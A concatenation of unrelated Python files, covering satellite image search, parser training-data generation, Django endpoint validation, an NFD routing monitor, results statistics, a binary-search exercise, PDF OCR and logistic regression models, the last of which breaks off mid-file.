"endDate": now().isoformat()
},
"maxResults": 10,
"startingNumber": 1,
"sortOrder": "ASC",
"apiKey": apikey
}
return makeApiReq("search",data)
def get_imgs(bbox):
out = []
l = login()
o = query_data(l,bbox)
for img in o["data"]["results"]:
out.append({
"date": arrow.get(img["acquisitionDate"],'YYYY-MM-DD').format(),
"footprint": shape(img["spatialFootprint"]).wkt,
"img": img["browseUrl"]
})
return out
if __name__ == "__main__":
print(get_imgs({"nw": [-71.30126953125,42.53486817758702], "se": [-70.7958984375,42.204107493733176] }))
|
import pickle
from copy import deepcopy
from dataclasses import dataclass
from random import random, choice, shuffle
from typing import List
import torch
from torch.utils.data import Dataset as PyTorchDataset
from tqdm.auto import tqdm
from parseridge.corpus.relations import Relations
from parseridge.corpus.sentence import Sentence
from parseridge.corpus.vocabulary import Vocabulary
from parseridge.parser.configuration import Configuration
from parseridge.parser.modules.utils import pad_tensor
from parseridge.utils.helpers import Action, T
from parseridge.utils.logger import LoggerMixin
@dataclass
class ConfigurationItem:
sentence: torch.Tensor
stack: torch.Tensor
buffer: torch.Tensor
gold_transition: torch.Tensor
gold_relation: torch.Tensor
wrong_transitions: torch.Tensor
wrong_relations: torch.Tensor
_current_iteration: int = 0
def to(self, device) -> "ConfigurationItem":
new_item = {}
for k, v in self.__dict__.items():
if isinstance(v, torch.Tensor):
new_item[k] = v.to(device)
return ConfigurationItem(**new_item)
def __iter__(self):
return self
def __next__(self):
fields = [v for k, v in self.__dict__.items() if not k.startswith("_")]
if self._current_iteration >= len(fields):
self._current_iteration = 0
raise StopIteration
else:
self._current_iteration += 1
return fields[self._current_iteration - 1]
@dataclass
class ConLLDataset(PyTorchDataset, LoggerMixin):
data_points: List[ConfigurationItem]
vocabulary: Vocabulary
relations: Relations
device: str = "cpu"
def to(self, device: str) -> "ConLLDataset":
data_points = [data_point.to(device) for data_point in self.data_points]
return ConLLDataset(data_points, self.vocabulary, self.relations, device)
def __len__(self):
return len(self.data_points)
def get_length_tensor(self, tensor):
if not len(tensor.shape):
# Handling scalars
return torch.tensor(1, device=self.device)
return torch.tensor(tensor.shape[0], device=self.device)
def __getitem__(self, index: int):
if not self.data_points:
raise ValueError("Call `ConLLDataset.reset()` first to generate data points.")
item = self.data_points[index]
features = []
for feature in item:
features.append(feature)
features.append(self.get_length_tensor(feature))
return tuple(features)
@staticmethod
def collate_batch(batch):
"""
Collate function that must be used in the DataLoader for this DataSet.
Pads the sequences of various length and returns a list of tensors.
Parameters
----------
batch : list of tuples of Tensor
Returns
-------
List of Tensor
"""
# Sort batch according to sentence length
sentence_lengths = [item[1] for item in batch]
order = sorted(
range(len(sentence_lengths)), key=lambda k: sentence_lengths[k], reverse=True
)
batch = [batch[i] for i in order]
ret = []
num_features = len(batch[0])
for idx in range(0, num_features, 2):
lengths = [item[idx + 1] for item in batch]
if not len(batch[0][idx].shape):
# Don't pad scalars
features = torch.stack([item[idx] for item in batch])
else:
max_length = max(lengths)
features = torch.stack(
[pad_tensor(item[idx], max_length, padding=0) for item in batch]
)
ret.append(features)
ret.append(torch.stack(lengths))
return ret
def save(self, path: str):
pickle.dump(self.to("cpu"), open(path, "wb"), protocol=4)
@classmethod
def load(cls, path: str):
return pickle.load(open(path, "rb"))
@dataclass
class TrainingBatch:
sentences: torch.Tensor
sentence_lengths: torch.Tensor
stacks: torch.Tensor
stack_lengths: torch.Tensor
buffers: torch.Tensor
buffer_lengths: torch.Tensor
gold_transitions: torch.Tensor
gold_transitions_lengths: torch.Tensor
gold_relations: torch.Tensor
gold_relations_lengths: torch.Tensor
wrong_transitions: torch.Tensor
wrong_transitions_lengths: torch.Tensor
wrong_relations: torch.Tensor
wrong_relations_lengths: torch.Tensor
@dataclass
class DataGenerator(LoggerMixin):
vocabulary: Vocabulary
relations: Relations
oov_probability: float = 0.25
token_dropout: float = 0.001
error_probability: float = 0.1
device: str = "cpu"
def generate_configuration(self, sentence: Sentence) -> ConfigurationItem:
configuration = Configuration(
sentence, contextualized_input=None, model=None, device=self.device
)
item_filter = set()
for configuration_item in self._generate_next_datapoint(configuration):
feature_key = (
tuple(configuration_item.stack.cpu().tolist()),
tuple(configuration_item.buffer.cpu().tolist()),
)
if feature_key not in item_filter:
item_filter.add(feature_key)
yield configuration_item
def generate_dataset(self, sentences: List[Sentence]) -> ConLLDataset:
new_data_points = []
with tqdm(sentences, desc="Generating training examples", maxinterval=1) as pbar:
for sentence in pbar:
new_data_points += list(self.generate_configuration(sentence))
pbar.set_description(
f"Generating training examples ({len(new_data_points)})"
)
return ConLLDataset(
data_points=new_data_points,
vocabulary=self.vocabulary,
relations=self.relations,
device=self.device,
)
def _generate_next_datapoint(self, configuration):
if not configuration.is_terminal:
stack = configuration.stack_tensor
buffer = configuration.buffer_tensor
possible_actions = list(self._get_possible_action(configuration))
costs, shift_case = configuration.get_transition_costs(possible_actions)
valid_actions = configuration.get_valid_actions(possible_actions, costs)
wrong_actions = configuration.get_wrong_actions(possible_actions, costs)
if valid_actions:
actions = [("valid", choice(valid_actions))]
if random() < self.error_probability and costs[T.SWAP] != 0:
selected_wrong_actions = self._remove_label_duplicates(wrong_actions)
transitions = set([a.transition for a in valid_actions])
selected_wrong_actions = [
a
for a in selected_wrong_actions
if a.transition != T.SWAP and a.transition not in transitions
]
if selected_wrong_actions:
wrong_action = choice(selected_wrong_actions)
actions.append(("wrong", wrong_action))
shuffle(actions)
for i, (source, action) in enumerate(actions):
if len(actions) == 1 or i == len(actions) - 1:
# If this the only / last action, reuse the existing
# configuration to avoid the deepcopy overhead.
new_config = configuration
else:
new_config = Configuration(
deepcopy(configuration.sentence),
None,
None,
False,
configuration.device,
)
new_config.buffer = deepcopy(configuration.buffer)
new_config.stack = deepcopy(configuration.stack)
new_config.update_dynamic_oracle(action, shift_case)
new_config.apply_transition(action)
gold_transition, gold_relation = self._get_gold_labels(action)
if source == "valid":
wrong_transitions_tensor, wrong_relations_tensor = self._get_all_labels(
wrong_actions
)
yield ConfigurationItem(
sentence=self._get_sentence_tensor(new_config.sentence),
stack=stack,
buffer=buffer,
gold_transition=gold_transition,
gold_relation=gold_relation,
wrong_transitions=wrong_transitions_tensor,
wrong_relations=wrong_relations_tensor,
)
for configuration_item in self._generate_next_datapoint(new_config):
yield configuration_item
@staticmethod
def _remove_label_duplicates(actions):
seen_transitions = set()
filtered_actions = []
for action in actions:
if action.transition not in seen_transitions:
seen_transitions.add(action.transition)
filtered_actions.append(action)
return filtered_actions
@staticmethod
def _select_actions(actions):
probabilities = [1.0, 0.4, 0.1]
filtered_actions = []
for probability in probabilities:
if random() <= probability:
other_actions = [
action for action in actions if action not in filtered_actions
]
if not other_actions:
break
filtered_actions.append(choice(other_actions))
return filtered_actions
def _get_sentence_tensor(self, sentence):
tokens = []
for token in sentence:
token_id = self.vocabulary.add(token.form)
frequency = self.vocabulary.get_count(token.form)
if self.oov_probability:
if random() > (frequency + (frequency / self.oov_probability)):
token_id = self.vocabulary.oov
if random() < self.token_dropout:
token_id = self.vocabulary.oov
tokens.append(token_id)
return torch.tensor(tokens, dtype=torch.int64, device=self.device)
def _get_gold_labels(self, action):
relation_id = self.relations.label_signature.get_id(action.get_relation_object())
return (
torch.tensor(action.transition.value, dtype=torch.int64, device=self.device),
torch.tensor(relation_id, dtype=torch.int64, device=self.device),
)
def _get_all_labels(self, actions):
transitions = []
relations = []
for action in actions:
relation_id = self.relations.label_signature.get_id(
action.get_relation_object()
)
transition_id = action.transition.value
relations.append(relation_id)
transitions.append(transition_id)
return (
torch.tensor(transitions, dtype=torch.int64, device=self.device),
torch.tensor(relations, dtype=torch.int64, device=self.device),
)
@staticmethod
def _get_possible_action(configuration):
if configuration.left_arc_conditions:
yield Action(
relation=configuration.top_stack_token.relation,
transition=T.LEFT_ARC,
score=1.0,
np_score=1.0,
)
if configuration.right_arc_conditions:
yield Action(
relation=configuration.top_stack_token.relation,
transition=T.RIGHT_ARC,
score=1.0,
np_score=1.0,
)
if configuration.shift_conditions:
yield Action(relation=None, transition=T.SHIFT, score=1.0, np_score=1.0)
if configuration.swap_conditions:
yield Action(relation=None, transition=T.SWAP, score=1.0, np_score=1.0)
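# --- Hedged usage sketch (added; not part of the original module) ---
# Shows how the classes above are meant to fit together: DataGenerator produces
# oracle ConfigurationItems, ConLLDataset wraps them, and collate_batch pads each
# batch for a standard PyTorch DataLoader. The vocabulary/relations/sentences are
# assumed to be built elsewhere with the corpus utilities imported at the top of
# this file; the batch size is arbitrary.
def build_data_loader(
    sentences: List[Sentence],
    vocabulary: Vocabulary,
    relations: Relations,
    batch_size: int = 32,
):
    from torch.utils.data import DataLoader

    generator = DataGenerator(vocabulary=vocabulary, relations=relations)
    dataset = generator.generate_dataset(sentences)
    # Each batch yielded by this loader can be unpacked as TrainingBatch(*batch).
    return DataLoader(dataset, batch_size=batch_size, collate_fn=ConLLDataset.collate_batch)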
|
"""
If you are trying to understand how to use the API, this is the wrong file.
This file contains generic request validation which applies to broad categories
of requests, e.g. requests from teachers, or requests from students
This stuff exists just so we don't have to type it over and over
"""
from django.http import HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError, HttpResponseNotAllowed
from seat.models.teacher import Teacher
from seat.models.student import Student
import logging
logger = logging.getLogger('api')
ID_MAX = 214748364
def get_dict_by_method(request, method):
if method == "POST": return request.POST
if method == "GET": return request.GET
if method == "DELETE": return request.DELETE
if method == "PUT": return request.PUT
def id_is_valid(id):
return (id is not None and str(id).strip() != '' and int(id) < ID_MAX)
def key_is_substring_of_some_dict_key(key, dictionary):
for dict_key in dictionary.keys():
if dict_key.find(key) >= 0:
return True
return False
def all_required_values_present(values, request, method):
dictionary = get_dict_by_method(request, method)
for key in values:
if not key_is_substring_of_some_dict_key(key, dictionary):
return False
return True
def standard_student_endpoint(
endpoint_name,
required_values,
method,
request,
functor):
"""
# @required_values = array of necessary values for the endpoint to function
# @method = POST, PUT, GET, DELETE
# @request = request object from django
#
# @functor = function that actually does the
# specific logic for this endpoint;
# takes (student_query, request) as params
"""
try:
# verify method
if request.method != method:
logger.warn("non-"+method+" request landed in "+method+" logic at "+endpoint_name+" in the api")
return HttpResponseBadRequest("bummer. your non-"+method+" request landed in the "+method+" logic.")
# verify the user is potentially authorized
# user_id is only placed in the session by us
# when the user logs into the application
if 'user_id' not in request.session:
logger.debug("unauthenticated request to "+endpoint_name)
return HttpResponseForbidden('not authenticated')
user_id = request.session.get('user_id')
# verify the user id is regular
if not id_is_valid(user_id):
logger.debug("invalid id in request to"+endpoint_name)
return HttpResponseBadRequest("Invalid ID")
# verify each of the desired parameters is present in the method body
if not all_required_values_present(required_values, request, method):
logger.info("bad request made to "+endpoint_name+", not enough params "+str(request))
return HttpResponseBadRequest("expected more values, expected these:"+str(required_values))
# get the query for the student
student_query = Student.objects.filter(id=user_id)
# verify that this requesting user actually exists
if not student_query.exists():
logger.info("user who was not a student made a request to "+endpoint_name+", id of user:"+str(request.session['user_id']))
return HttpResponseNotAllowed('not authorized')
# endpoint specific logic
return functor(student_query, request)
except Exception as error:
logger.info("error in api endpoint "+endpoint_name+":"+str(error))
return HttpResponseServerError("unhandled error")
def standard_teacher_endpoint(
endpoint_name,
required_values,
method,
request,
functor):
"""
# @required_values = array of necessary values for the endpoint to function
# @method = POST, PUT, GET, DELETE
# @request = request object from django
#
# @functor = function that actually does the
# specific logic for this endpoint;
# takes (teacher_query, request) as params
"""
try:
# validate we are receiving expected method
if request.method != method:
logger.warn("non-"+method+" request landed in "+method+" logic at "+endpoint_name+" in the api:"+str(request))
return HttpResponseBadRequest("bummer. your non-"+method+" request landed in the "+method+" logic.")
# validate that the user may be authorized to
# perform this action - we set the user_id in the
# session at login
if 'user_id' not in request.session:
logger.debug("unauthenticated request to "+endpoint_name)
return HttpResponseForbidden('not authenticated')
teacher_id = request.session.get('user_id')
# check that the id is valid for usage
if not id_is_valid(teacher_id):
return HttpResponseBadRequest("invalid id")
# get the query for this teacher
teacher_query = Teacher.objects.filter(id=teacher_id)
# validate that there is some teacher with this id
if not teacher_query.exists():
logger.info("user who was not a teacher made a request to "+endpoint_name+", id of user:"+str(teacher_id))
return HttpResponseForbidden('not a teacher!')
# validate that all desired parameters are present in the request body
if not all_required_values_present(required_values, request, method):
logger.info("bad request made to "+endpoint_name+", not enough params ")
return HttpResponseBadRequest("expected more values, expected these:"+str(required_values))
# perform the endpoint specific logic
return functor(teacher_query, request)
except Exception as error:
logger.info("error in api endpoint "+endpoint_name+":"+str(error))
return HttpResponseServerError("unhandled error?!")
|
import httplib
import sys
import os
import time
import subprocess
import json
from subprocess import check_output
import pprint
process_name= "sudo /usr/local/bin/nfd" # change this to the name of your process
filename="/root/nfd_conf"
notNotied=True
while True:
tmp = os.popen("ps -Af").read()
if process_name not in tmp[:]:
print "The process is not running. Let's restart."
newprocess="nfd-start &> /var/log/nfd_log"
os.system(newprocess)
else:
print "The process is running."
line = subprocess.check_output(['tail', '-1', filename])
print(line)
new_config=json.loads(str(line))
if (new_config.get("container_down","null")!="null" and notNotied):
notNotied=True
conn = httplib.HTTPConnection(sys.argv[1], sys.argv[2], timeout=5)
header = {}
# there is data to send
if new_config is not None:
# encode it in json format
data = json.dumps(new_config)
header['Content-Type'] = 'application/json'
# send the request and get the response
conn.request('POST','/router/notifications/finish_scale_out',data,header)
res = conn.getresponse()
print(str(res.status))
new_rules={}
if (len(new_config["to_add"])>0):
new_rules=new_config["to_add"]
out = check_output('nfd-status')
faceid_list = [face for face in out.split('\n') if ("remote=tcp" in face)]
face_olds={}
ip_olds={}
for face_old in faceid_list:
values = [value for value in face_old.split(' ') if value != '']
faceid=values[0].split('faceid=')[1]
if values[1].split('=')[0] == 'remote':
remote_face = values[1].split('://')[1]
face_olds[remote_face]=faceid
ip_olds[remote_face.split(':')[0]]=faceid
for f_o in face_olds:
print(f_o)
prefix_list = [face for face in out.split('\n') if ("nexthops" in face)]
prefix_ids={}
for p in prefix_list:
values = [value for value in p.split(' nexthops=') if value != '']
prefix=values[0].split(' ')[2]
faces_v=values[1].split(',')
prefix_ids[prefix]=[]
for f in faces_v:
prefix_ids[prefix].append(f.split('faceid=')[1].split(' ')[0])
pprint.pprint(prefix_ids)
for key, face_list in new_rules.iteritems():
prefix =key
#print(prefix_ids[prefix])
for face in face_list:
if face.split(":")[0] in ip_olds.keys():
print("face 1 :"+face)
#for i in range(0):
if (face in face_olds.keys()):
print(face)
if (face_olds[str(face)] not in prefix_ids[prefix]):
print(face)
interface = " tcp://"+face
str_command = "nfdc register "+prefix+interface
ping_command = "ping -c 5 "+face.split(':')[0]
subprocess.call(args=ping_command, shell=True)
subprocess.call(args=str_command, shell=True)
else:
for face_o in face_olds.keys():
print(face_o)
if face_o.split(":")[0]==face.split(":")[0]:
un_str_command = "nfdc unregister "+prefix+" tcp://"+face_o
subprocess.call(args=un_str_command, shell=True)
interface = " tcp://"+face
str_command = "nfdc register "+prefix+interface
ping_command = "ping -c 5 "+face.split(':')[0]
subprocess.call(args=ping_command, shell=True)
subprocess.call(args=str_command, shell=True)
else:
interface = " tcp://"+face
str_command = "nfdc register "+prefix+interface
ping_command = "ping -c 5 "+face.split(':')[0]
subprocess.call(args=ping_command, shell=True)
subprocess.call(args=str_command, shell=True)
time.sleep(2)
if (len(new_config["strategy"])>0):
if (new_config["strategy"]=="round"):
strategy_command = "nfdc strategy set {0} /localhost/nfd/strategy/round-robin/%FD%01".format(prefix)
subprocess.call(args=strategy_command, shell=True)
time.sleep(1)
|
import pandas as pd
import os
# Define the results directory
directory = 'Results3/'
# Build the list with all the files
files = [f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
# Loop that iterates over all the files
csv1 = 'instance, mean iterations, sd iterations, mean bins, sd bins, mean score, sd score, mean neighbors, sd neighbors, mean time, sd time \n'
csv2 = 'instance, mean, min, max, q1, q2, q3 \n'
csv3 = 'instance, best score, best bins, optimal solution, difference \n'
optimal = pd.read_csv('../Instances/optimalSolutions.csv')
for f in files:
print(f)
df = pd.read_csv(directory+f,header=None,encoding="unicode_escape")
df = df.iloc[1:]
df = df.reset_index(drop=True)
convert_dict = {0: int,
1: int,
2: float,
3: str,
4: str,
5: str,
6: int,
7: float}
df = df.astype(convert_dict)
csv1 += f.replace('.csv','')+', '+'{:.3f}'.format(df[0].mean())+', '+'{:.3f}'.format(df[0].std())+', '+'{:.3f}'.format(df[1].mean())+', '+'{:.3f}'.format(df[1].std())+', '+'{:.3f}'.format(df[2].mean())+', '+'{:.3f}'.format(df[2].std())+', '+'{:.3f}'.format(df[6].mean())+', '+'{:.3f}'.format(df[6].std())+', '+'{:.3f}'.format(df[7].mean())+', '+'{:.3f}'.format(df[7].std())+'\n'
csv2 += f.replace('.csv','')+', '+'{:.3f}'.format(df[2].mean())+', '+'{:.3f}'.format(df[2].min())+', '+'{:.3f}'.format(df[2].max())+', '+'{:.3f}'.format(df[2].quantile(0.25))+', '+'{:.3f}'.format(df[2].quantile(0.5))+', '+'{:.3f}'.format(df[2].quantile(0.75))+'\n'
ind = df[2].idxmax()
ind2 = optimal.index[optimal['Instance']==f.replace('.csv','')][0]
csv3 += f.replace('.csv','')+', '+'{:.3f}'.format(df[2].iloc[ind])+', '+'{:.3f}'.format(df[1].iloc[ind])+', '+'{:.3f}'.format(optimal['Optimal'].iloc[ind2])+', '+'{:.3f}'.format(df[1].iloc[ind]-optimal['Optimal'].iloc[ind2])+'\n'
file = open('Results3/Summary/Statistics.csv', 'w')
file.writelines(csv1)
file.close()
file = open('Results3/Summary/ScoreDistribution.csv', 'w')
file.writelines(csv2)
file.close()
file = open('Results3/Summary/BestSolutions.csv', 'w')
file.writelines(csv3)
file.close()
|
def bs(a, l, r, v):
# recursive binary search: returns an index of v in the sorted list a[l..r], or -1 if absent
mid = l + (r - l)//2
if l > r:
return -1
if a[mid] == v:
return mid
idx = 0
if v > a[mid]:
idx = bs(a, mid + 1, r, v)
if v < a[mid]:
idx = bs(a, l, mid - 1, v)
return idx
n = int(input())
soma = 0
a = []
for i in input().split():
j = int(i)
a.append(j)
soma += j
c = [x for x in a]
a.sort()
j = []
num = 0
for i in range(0, len(a)):
b = a[0:i] + a[i+1:len(a)]
idx = bs(b, 0, len(a) - 2, (soma - a[i])//2)
if idx != -1 and b[idx]*2 == (soma - a[i]):
idx2 = [k for k, val in enumerate(c) if val == a[i]]
if j.__contains__(idx2) == False:
j.append(idx2)
for i in j:
num += len(i)
print(num)
for i in j:
for k in range(0, len(i)):
if i == j[len(j) - 1] and k == len(i) - 1:
print(i[k] + 1, end='')
else:
print(i[k] + 1, end=' ')
print()
|
# Import libraries
from PIL import Image
import pytesseract
import sys
from pdf2image import convert_from_path
import os
from PyPDF2 import PdfFileReader, PdfFileWriter
def pdf_splitter(path):
# scan the raw PDF bytes for embedded JPEG streams and dump each one to jpgN.jpg
pdf = open(path, "rb").read()
startmark = b"\xff\xd8"
startfix = 0
endmark = b"\xff\xd9"
endfix = 2
i = 0
njpg = 0
while True:
istream = pdf.find(b"stream", i)
if istream < 0:
break
istart = pdf.find(startmark, istream, istream+20)
if istart < 0:
i = istream+20
continue
iend = pdf.find(b"endstream", istart)
if iend < 0:
raise Exception("Didn't find end of stream!")
iend = pdf.find(endmark, iend-20)
if iend < 0:
raise Exception("Didn't find end of JPG!")
istart += startfix
iend += endfix
print("JPG ",njpg," from ",istart," to ",iend)
jpg = pdf[istart:iend]
jpgname='jpg'+str(njpg)+'.jpg'
jpgfile = open("jpg%d.jpg" % njpg, "wb")
jpgfile.write(jpg)
jpgfile.close()
njpg += 1
i = iend
# Path of the pdf
PDF_file = sys.argv[1]
'''
Part #1 : Converting PDF to images
'''
# Store all the pages of the PDF in a variable
pages = convert_from_path(PDF_file, 500)
# Counter to store images of each page of PDF to image
image_counter = 1
# Iterate through all the pages stored above
for page in pages:
filename = PDF_file+"page_"+str(image_counter)+".jpg"
# Save the image of the page in system
page.save(filename, 'JPEG')
# Increment the counter to update filename
image_counter = image_counter + 1
if(os.stat(filename).st_size == 0):
pdf_splitter(PDF_file)
|
# Author: Ziga Trojer, zt0006@student.uni-lj.si
import pandas as pd
import numpy as np
import math
import scipy
from scipy import optimize
from sklearn.preprocessing import StandardScaler
import random
import scipy.stats as st
def p_object_j_observation_i(current_class, X, B):
"""
:param current_class: chosen class
:param X: input data
:param B: matrix of weights
:return: probabilities for class current_class
"""
denominator = 0
for c in range(len(classes) - 1):
denominator += pow(math.e, np.dot(B[c, 1:], np.transpose(X)) + B[c, :1])
if current_class < len(classes) - 1:
return pow(math.e, np.dot(B[current_class, 1:], np.transpose(X)) + B[current_class, :1]) / (1 + denominator)
else:
return 1 / (1 + denominator)
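# Added note: the two branches above implement the reference-class (last class)
# parameterisation of multinomial logistic regression,
#   P(y = c | x) = exp(b_c + w_c . x) / (1 + sum_k exp(b_k + w_k . x))   for c < K-1
#   P(y = K-1 | x) = 1 / (1 + sum_k exp(b_k + w_k . x))
# where the sum runs over the K-1 non-reference classes.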
def softmax(X, B):
"""
:param X: input data
:param B: matrix of weight
:return: softmax array of size (number of data points) x (number of classes)
"""
softmax_array = np.zeros((X.shape[0], B.shape[0] + 1))
for c in range(len(classes)):
softmax_array[:, c] = np.array(p_object_j_observation_i(c, X, B))[:]
return softmax_array
def log_likelihood(B, X, y, shape):
"""
:param B: matrix of weights
:param X: input data
:param y: input response
:param shape: shape of B
:return: log-likelihood
"""
B = np.reshape(B, shape)
temp_likelihood = 0
softmax_vector = softmax(X, B)
softmax_vector_log = np.log(softmax_vector)
for k in range(len(y)):
true_class = y[k]
temp_likelihood += softmax_vector_log[k, true_class]
return -temp_likelihood
def standard_logistic_distribution(x):
"""
:param x: x
:return: value between 0 and 1
"""
return 1/2 + 1/2 * np.tanh(x/2)
def ordinal_probabilities(X, W, T):
"""
:param X: input data
:param W: vector of weights
:param T: vector of boundaries
:return: probabilities for ordinal logistic regression
"""
u = np.zeros((X.shape[0], 1))
p = np.zeros((X.shape[0], len(T)-1))
for i in range(X.shape[0]):
u[i] = np.dot(W[1:], X[i]) + W[0]
for j in range(0, len(T)-1):
p[i, j] = standard_logistic_distribution(T[j+1]-u[i][0]) - standard_logistic_distribution(T[j]-u[i][0])
return p
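# Added note: with u = w . x + b and thresholds t_0 = -inf < t_1 < ... < t_K = +inf,
# the loop above computes the ordinal (proportional-odds) probabilities
#   P(y = j | x) = sigma(t_{j+1} - u) - sigma(t_j - u)
# where sigma is the standard logistic CDF implemented in standard_logistic_distribution.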
def log_likelihood_ordinal(weights_W_T, X, y):
"""
:param weights_W_T: combined weights and boundaries
:param X: input data
:param y: input response
:return: log_likelihood value
"""
bound = X.shape[1]
W = weights_W_T[:bound+1]
diff = weights_W_T[bound+1:]
temp_likelihood = 0
T = np.zeros((len(set(y))))
T[0] = -np.Inf
T = np.append(T, np.Inf)
for k in range(2, len(T)-1):
T[k] = T[k - 1] + diff[k - 1]
probab = ordinal_probabilities(X, W, T)
for k in range(len(y)):
true_class = y[k]
temp_likelihood += math.log(probab[k, true_class])
return -temp_likelihood
def get_accuracy(predictions, real_values):
"""
:param predictions: vector of predictions
:param real_values: true values
:return: accuracy
"""
acc = 0
for first, second in zip(predictions, real_values):
if first == second:
acc += 1
return acc / len(predictions)
class ModelMultinomial:
def __init__(self):
self.weights = None
def update_weights(self, new_weights):
"""
:param new_weights: array of new weights
"""
self.weights = new_weights
def predict(self, X):
"""
:param X: input data
:return: vector of predictions
"""
predicted_class = list()
probabilities = softmax(X, self.weights)
prediction_len = len(probabilities)
for k in range(prediction_len):
pred = list(probabilities[k]).index(max(list(probabilities[k])))
predicted_class.append(pred)
return predicted_class
def log_loss(self, X, y):
"""
:param X: input data
:param y: true values
:return: log-loss value
"""
log_loss_value = 0
probabilities = softmax(X, self.weights)
for i in range(len(y)):
true_class = y[i]
prob = probabilities[i, true_class]
log_loss_value += math.log(prob)
return - log_loss_value / len(y)
class ModelLogistic:
def __init__(self):
self.weights = None
self.boundary = None
def update_weights(self, new_weights):
"""
:param new_weights: vector of new weights
"""
self.weights = new_weights
def update_boundary(self, new_boundary):
"""
:param new_boundary: vector of new boundaries
"""
self.boundary = new_boundary
def predict(self, X):
"""
:param X: input data
:return: vector of predictions
"""
predicted_class = list()
probabilities = ordinal_probabilities(X, self.weights, self.boundary)
prediction_len = len(probabilities)
for k in range(prediction_len):
pred = list(probabilities[k]).index(max(list(probabilities[k])))
predicted_class.append(pred)
return predicted_class
def log_loss(self, X, y):
"""
:param X: input data
:param y: true values
:return: log-loss value
"""
log_loss_value = 0
probabilities = ordinal_probabilities(X, self.weights, self.boundary)
for i in range(len(y)):
true_class = y[i]
prob = probabilities[i, true_class]
log_loss_value += math.log(prob)
return - log_loss_value / len(y)
class MultinomialLogReg:
def __init__(self):
self.initial_size = 2
def build(self, X, y):
"""
:param X: input data
:param y: input response
:return: model as an object ModelMultinomial
"""
model = ModelMultinomial()
shape = (len(list(set(y))) - 1, X.shape[1]+1)
initial_guess = np.ones(shape) / self.initial_size
c = scipy.optimize.fmin_l_bfgs_b(log_likelihood, x0=initial_guess, args=[X, y, shape], approx_grad=True)
model.update_weights(c[0].reshape(shape))
if c[2]['warnflag'] == 0:
print('Optimization algorithm converged. Multinomial Logistic Regression successfully fitted!')
elif c[2]['warnflag']:
print('Too many function evaluations or too many iterations!')
else:
print(f"Stopped for the reason: {c[2]['task']}")
return model
class OrdinalLogReg:
def __init__(self):
self.initial_size = 15
def build(self, X, y):
"""
:param X: input data
:param y: input response
:return: model as an object ModelLogistic
"""
model = ModelLogistic()
shape_diff = (1, len(set(y))-1)
shape = (1, X.shape[1]+1)
initial_guess = np.ones(shape) / self.initial_size
initial_guess = np.append(initial_guess, np.full(shape_diff, 1e-10))
bounds = [(None, None)] * shape[1]
bounds += [(1e-10, None)] * shape_diff[1]
c = scipy.optimize.fmin_l_bfgs_b(log_likelihood_ordinal,
x0=initial_guess,
args=[X, y],
bounds=bounds,
approx_grad=True)
model.update_weights(c[0][:shape[1]])
# write coefficients into csv
print(c[0])
write = False
if write:
keys = ['intersection', 'age', 'sex', 'year', 'X1', 'X2', 'X3', 'X4', 'X5', 'X6', 'X7', 'X8', 'delta1', 'delta2', 'delta3']
values = c[0]
res = {keys[i]: values[i] for i in range(len(keys))}
df = pd.DataFrame(res, index=[0])
df.to_csv('weights_logistic.csv', index=False)
if c[2]['warnflag'] == 0:
print('Optimization algorithm converged. Ordinal Logistic Regression successfully fitted!')
elif c[2]['warnflag']:
print('Too many function evaluations or too many iterations!')
else:
print(f"Stopped for the reason: {c[2]['task']}")
T = np.zeros((len(set(y))))
T[0] = -np.Inf
T = np.append(T, np.Inf)
for k in range(2, len(T)-1):
T[k] = T[k-1] + c[0][shape[1]+k-1]
model.update_boundary(T)
print(T)
return model
def split_index(x_data, k):
"""Splits data into k folds"""
folds = list()
indexes = list(range(len(x_data)))
for j in range(k):
fold = random.Random(42).sample(indexes, round(len(x_data) / k))
folds.append(fold)
for element in fold:
indexes.remove(element)
return folds, list(range(len(x_data)))
def get_cross_validation_data(x_data, y_data, k):
"""Returns training and testing folds of x_data and y_data"""
train_x, train_y = list(), list()
test_x, test_y = list(), list()
indexes, all_index = split_index(x_data, k)
for test_index in indexes:
test_y.append(list(np.array(y_data)[test_index]))
test_x.append(x_data[test_index])
train_index = [i for i in all_index if i not in test_index]
train_x.append(x_data[train_index])
train_y.append(list(np.array(y_data)[train_index]))
return train_x, train_y, test_x, test_y
def naive_model_log_loss(y):
log_loss_value = 0
p = [0.15, 0.1, 0.05, 0.4, 0.3]
for t in range(len(y)):
log_loss_value += math.log(p[y[t]])
return -log_loss_value / len(y)
def scale_data(X):
scaler = StandardScaler()
scaler.fit(X)
return scaler.transform(X)
def log_loss_cv(X, y, k):
cross_train_x, cross_train_y, cross_test_x, cross_test_y = get_cross_validation_data(X, y, k)
multinomial_list = list()
ordinal_list = list()
naive_list = list()
for X, Y, Z, W in zip(cross_train_x, cross_train_y, cross_test_x, cross_test_y):
print('Next fold!')
X = scale_data(X)
Z = scale_data(Z)
multinomial_mdl = MultinomialLogReg()
multinomial_mdl_build = multinomial_mdl.build(X, Y)
multinomial_list.append(multinomial_mdl_build.log_loss(Z, W))
ordinal_mdl = OrdinalLogReg()
ordinal_mdl_build = ordinal_mdl.build(X, Y)
ordinal_list.append(ordinal_mdl_build.log_loss(Z, W))
naive_list.append(naive_model_log_loss(W))
multinomial_ci = st.t.interval(0.95, len(multinomial_list) - 1, np.mean(multinomial_list), st.sem(multinomial_list))
ordinal_ci = st.t.interval(0.95, len(ordinal_list) - 1, np.mean(ordinal_list), st.sem(ordinal_list))
naive_ci = st.t.interval(0.95, len(naive_list) - 1, np.mean(naive_list), st.sem(naive_list))
return multinomial_ci, np.mean(multinomial_list), ordinal_ci, np.mean(ordinal_list), naive_ci, np.mean(naive_list)
if __name__ == "__main__":
# load data
dataset = pd.read_csv('dataset.csv', sep=';')
# correlation = dataset.corr(method='pearson')
# correlation.to_csv('correlation.csv', index=False)
# separate to response
Y_data, X_data = dataset.response, dataset.iloc[:, 1:]
# define classes
classes_ordinal = Y_data.unique()
class_order = [4, 1, 5, 3, 2]
classes_ordinal = [x for _, x in sorted(zip(class_order, classes_ordinal))]
classes = [y-1 for y, _ in sorted(zip(class_order, classes_ordinal))]
d = dict([(y, x) for x, y in enumerate(classes_ordinal)])
# transform feature sex into is_female
sex_dict = {'M': 0, 'F': 1}
X_data.sex = X_data.sex.map(sex_dict)
new_Y = list(Y_data.map(d))
new_X = X_data.values
# set this value to True, if want to check CV
cross_valid = True
if cross_valid:
print(log_loss_cv(new_X, new_Y, 10))
new_X = scale_data(new_X)
test_own_dataset = False
if test_own_dataset:
